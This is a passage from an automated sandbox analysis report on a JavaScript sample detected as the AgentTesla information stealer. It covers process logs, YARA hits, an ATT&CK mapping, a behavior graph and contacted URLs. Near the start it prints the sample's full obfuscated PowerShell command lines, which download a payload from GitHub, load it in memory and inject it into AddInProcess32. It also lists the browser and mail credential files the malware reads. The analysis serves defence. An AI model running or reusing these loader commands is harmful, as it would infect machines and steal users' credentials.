                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('b'+'08url = c'+'7ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/n'+'odetecto'+'n/node'+'tecton/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/de'+'tahno'+'th-v'+'.t'+'xtc'+'7i; b0'+'8bas'+'e64c'+'o'+'ntent = (new-obj'+'ec'+'t system.net.we'+'bclient).d'+'ownlo'+'ad'+'str'+'i'+'ng(b'+'08u'+'rl'+'); b0'+'8'+'bina'+'r'+'y'+'c'+'ont'+'ent ='+' [syst'+'em.conve'+'rt]::'+'fr'+'ombase64strin'+'g('+'b0'+'8ba'+'se64'+'cont'+'ent); '+'b08assembly '+'= [refl'+'ec'+'t'+'ion.assembly]::l'+'oad(b08'+'binaryc'+'o'+'nten'+'t)'+'; [dnlib'+'.i'+'o.h'+'om'+'e'+']::va'+'i('+'pq'+'u884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpqu,'+' pqu1pqu,'+' pquc:t'+'4yprogramdata'+'t4'+'y'+'pqu, p'+'qua'+'lcati'+'fap'+'qu, pquaddinpr'+'ocess3'+'2'+'pqu, pq'+'upqu,p'+'qu'+'p'+'qu)') -creplace ([char]112+[char]81+[char]85),[char]34 -creplace ([char]67+[char]55+[char]73),[char]39 -replace ([char]66+[char]48+[char]56),[char]36 -replace ([char]84+[char]52+[char]121),[char]92)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqganacsajwawadgadqbyagwaiaa9acaaqwanacsajwa3aekaaab0ahqacabzadoalwavahiayqanacsajwb3ac4ajwaraccazwbpaccakwanahqaaab1accakwanagiadqanacsajwbzaguacgbjag8abgb0accakwanaguabgb0accakwanac4aywanacsajwbvag0alwboaccakwanag8arablahqazqbjahqatwanacsajwbuac8atgbvaeqazqanacsajwb0aguaywb0ae8abgavahiazqbmahmajwaraccalwboaccakwanaguayqanacsajwbkaccakwanahmajwaraccalwanacsajwbtaccakwanageaaqbuac8arablaccakwanahqayqboae4abwanacsajwb0aggalqbwaccakwanac4adaanacsajwb4ahqaqwanacsajwa3aekaowagaeiamaanacsajwa4agiayqbzaccakwanaguanga0aemajwaraccabwanacsajwbuahqazqbuahqaiaa9acaakaboaguadwatae8aygbqaccakwanaguaywanacsajwb0acaauwb5ahmadablag0algboaguadaauafcazqanacsajwbiaemababpaguabgb0ackalgbeaccakwanag8adwbuagwabwanacsajwbhagqajwaraccauwb0ahiajwaraccaaqanacsajwbuagcakabcaccakwanadaaoab1accakwanahiabaanacsajwapadsaiabcadaajwaraccaoaanacsajwbiagkabgbhaccakwanahiajwaraccaeqanacsajwbdaccakwanag8abgb0accakwanaguabgb0acaapqanacsajwagafsauwb5ahmadaanacsajwblag0algbdag8abgb2aguajwaraccacgb0af0aoga6accakwanaeyacganacsajwbvag0aqgbhahmazqa2adqauwb0ahiaaqbuaccakwanagcakaanacsajwbcadaajwaraccaoabiageajwaraccacwbladyanaanacsajwbdag8abgb0accakwanaguabgb0ackaowagaccakwanaeiamaa4ageacwbzaguabqbiagwaeqagaccakwanad0aiabbafiazqbmagwajwaraccazqbjaccakwanahqajwaraccaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoataanacsajwbvageazaaoaeiamaa4accakwanagiaaqbuageacgb5aemajwaraccabwanacsajwbuahqazqbuaccakwanahqakqanacsajwa7acaawwbkag4ababpagiajwaraccalgbjaccakwanae8algbiaccakwanag8abqanacsajwblaccakwanaf0aoga6afyaqqanacsajwbjacgajwaraccacabraccakwanafuaoaa4adqazqanacsajwa4aguamabkaduamganacsajwbmadaalqanacsajwbladuayqanacsajwbiac0ajwaraccamqanacsajwaxadyanaatadaamabjadyajwaraccalqbhageayqayagyazga1aguajwaraccapqanacsajwbuaccakwanaguajwaraccaawanacsajwbvahqajgbhagkazablag0apqb0agwayqa/ahqaeaanacsajwb0accakwanac4anaayadaamgawadeanwawag4aaqbnaccakwanagkacgbvahiazqanacsajwbpahyayqb4ac8abwavag0abwanacsajwbjac4ajwaraccadabvahaacwbwahaayqauadqamgawadiacwanacsajwb0ahaaeqbyaccakwanagmajwaraccalwbiac8amab2accakwanac8abqbvagmajwaraccalganacsajwbzagkacabhaguababnaccakwanag8abwbnaccakwanac4azqanacsajwbnageacgbvaccakwanahqajwaraccacwblahmayqbiaccakwanaguacgbpagyajwaraccalwavadoajwaraccacwanacsajwbwahqajwaraccadaboahaauqbvacwajwaraccaiabwafeavqaxahaauqbvacwajwaraccaiabwafeavqbdadoavaanacsajwa0ahkauabyag8azwbyageabqbeageadabhaccakwanafqanaanacsajwb5accakwanahaauqbvacwaiabwaccakwanafeavqbhaccakwanagwaywbhahqaaqanacsajwbmageacaanacsajwbrafualaagahaauqbvaeeazabkaekabgbqahiajwaraccabwbjaguacwbzadmajwaraccamganacsajwbwafeavqasacaacabraccakwanafuacabrafualabwaccakwanafeavqanacsajwbwaccakwanafeavqapaccakqagacaalqbdahiazqbwaewayqbdaguaiaaoafsaqwboageaugbdadeamqayacsawwbdaggayqbsaf0aoaaxacsawwbdaggayqbsaf0aoaa1ackalabbaemaaabhafiaxqazadqaiaagac0aqwbyaguacabmageaqwblacaaiaaoafsaqwboageaugbdadyanwarafsaqwboageaugbdaduanqarafsaqwboageaugbdadcamwapacwawwbdaggayqbsaf0amwa5acaaiaatafiazqbqagJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('b'+'08url = c'+'7ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/n'+'odetecto'+'n/node'+'tecton/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/de'+'tahno'+'th-v'+'.t'+'xtc'+'7i; b0'+'8bas'+'e64c'+'o'+'ntent = (new-obj'+'ec'+'t system.net.we'+'bclient).d'+'ownlo'+'ad'+'str'+'i'+'ng(b'+'08u'+'rl'+'); b0'+'8'+'bina'+'r'+'y'+'c'+'ont'+'ent ='+' [syst'+'em.conve'+'rt]::'+'fr'+'ombase64strin'+'g('+'b0'+'8ba'+'se64'+'cont'+'ent); '+'b08assembly '+'= [refl'+'ec'+'t'+'ion.assembly]::l'+'oad(b08'+'binaryc'+'o'+'nten'+'t)'+'; [dnlib'+'.i'+'o.h'+'om'+'e'+']::va'+'i('+'pq'+'u884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpqu,'+' pqu1pqu,'+' pquc:t'+'4yprogramdata'+'t4'+'y'+'pqu, p'+'qua'+'lcati'+'fap'+'qu, pquaddinpr'+'ocess3'+'2'+'pqu, pq'+'upqu,p'+'qu'+'p'+'qu)') -creplace ([char]112+[char]81+[char]85),[char]34 -creplace ([char]67+[char]55+[char]73),[char]39 -replace ([char]66+[char]48+[char]56),[char]36 -replace ([char]84+[char]52+[char]121),[char]92)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information331
                  Scripting                  		Valid Accounts231
                  Windows Management Instrumentation                  		331
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		11
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		34
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		11
                  Registry Run Keys / Startup Folder                  		11
                  Registry Run Keys / Startup Folder                  		2
                  Obfuscated Files or Information                  		Security Account Manager531
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell                  		Login HookLogin Hook1
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets261
                  Virtualization/Sandbox Evasion                  		SSHKeylogging13
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528227 Sample: scan_374783.js Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 38 paste.ee 2->38 40 ip-api.com 2->40 42 raw.githubusercontent.com 2->42 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Yara detected AgentTesla 2->60 64 9 other signatures 2->64 10 wscript.exe 1 1 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 62 Connects to a pastebin service (likely for C&C) 38->62 process4 dnsIp5 46 paste.ee 188.114.97.3, 443, 49699, 49700 CLOUDFLARENETUS European Union 10->46 74 System process connects to network (likely due to code injection or exploit) 10->74 76 JScript performs obfuscated calls to suspicious functions 10->76 78 Suspicious powershell command line found 10->78 80 4 other signatures 10->80 18 powershell.exe 7 10->18         started        signatures6 process7 signatures8 50 Suspicious powershell command line found 18->50 52 Obfuscated command line found 18->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 21 powershell.exe 15 16 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 44 raw.githubusercontent.com 185.199.110.133, 443, 49709 FASTLYUS Netherlands 21->44 66 Creates autostart registry keys with suspicious values (likely registry only malware) 21->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->68 70 Writes to foreign memory regions 21->70 72 Injects a PE file into a foreign processes 21->72 27 AddInProcess32.exe 15 2 21->27         started        31 cmd.exe 2 21->31         started        signatures11 process12 dnsIp13 48 ip-api.com 208.95.112.1, 49744, 80 TUT-ASUS United States 27->48 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->82 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 27->84 86 Tries to steal Mail credentials (via file / registry access) 27->86 90 2 other signatures 27->90 36 C:\ProgramData\alcatifa.vbs, ASCII 31->36 dropped 88 Command shell drops VBS files 31->88 34 conhost.exe 31->34         started        file14 signatures15 process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  scan_374783.js3%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://oneget.org0%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  paste.ee
                  		188.114.97.3
                  		truetrue
                    		unknown
                    raw.githubusercontent.com
                    		185.199.110.133
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                          		unknown
                          https://paste.ee/d/gvOd3true
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://paste.ee:443/d/gvOd3wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://account.dyn.com/powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://paste.ee/d/gvOd3ee/dDwscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://go.micropowershell.exe, 0000000B.00000002.1413532103.0000027D0122A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.google.com;wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://raw.githubusercontpowershell.exe, 0000000B.00000002.1413532103.0000027D01707000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://analytics.paste.eewscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://ip-api.compAddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://paste.ee/wscript.exe, 00000000.00000003.1517826151.000001D52D429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D429000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                https://paste.ee/zDwscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://paste.ee/d/gvOd3wscript.exe, 00000000.00000003.1518428835.000001D52F330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517658450.000001D52D466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521404049.000001D52EE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D44E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517797280.000001D52D44D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517220439.000001D52EE7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517618403.000001D52D455000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517765900.000001D52D46C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521135156.000001D52EE40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520438484.000001D52D46D000.00000004.00000020.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://raw.githubusercontent.compowershell.exe, 0000000B.00000002.1413532103.0000027D01685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://ip-api.comAddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
